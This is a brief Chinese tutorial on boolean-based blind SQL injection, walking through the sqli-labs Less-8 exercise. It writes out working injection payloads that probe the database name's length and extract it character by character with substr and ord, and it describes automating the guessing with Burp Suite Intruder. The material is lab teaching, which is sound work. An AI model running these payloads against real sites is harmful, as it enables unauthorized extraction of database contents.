SQL注入之布尔盲注

布尔盲注

如果确定页面注入点存在，如果页面没有回显并且没有报错信息可以考虑使用布尔盲注。
布尔盲注的判断条件是页面布尔类型状态。
当传递参数[?id=1' and 1=1 --+]

这里以sqlilab的闯关为例。

当传递参数[?id=1’ and 1=2 --+]

比较两次的传递的参数，页面明显存在差异（布尔类型状态）。
利用这个差异，我们可以一点一点得到数据库的内容。例如想要获取当前数据库的名字。
1. 判断数据库名字的长度
可以自己先猜测一下数据库的长度，假如猜想的数字是8，提交参数[?id=1’ and length(database()) = 8 --+]，页面显示正常，就可以确定当前数据库名长度为8。如果页面不显示，可以用[?id=1’ and length(database()) > 8 --+] 或者 [?id=1’ and length(database()) < 8 --+] 来确定范围，再进一步的确定数据库长度。

2. 按位确定数据库名字
提交参数[?id=1’ and ord((substr(database(), 1, 1)))=115 --+]，页面显示正常，可以确定当前数据库名的第一位字母的ASCII 码值为115，那就是字母[s]。
http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+

按照这种方法我们可以确定数据库名第二个字母的ascii 值，语句如[?id=1’ and ord((substr(database(), 2, 1)))>0 --+]，依次确定数据库的字母。

但是这样做太耗费时间了，所以我们可以利用一下burpsuite.

启动BP，开启浏览器代理

第一步：确定数据库为几位 发送到intruder模块
第二步：确定数据库的具体字母
提交的SQL语句：http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+
使用BP抓包
选择 start attack 开始执行。
爆出数据库名：security。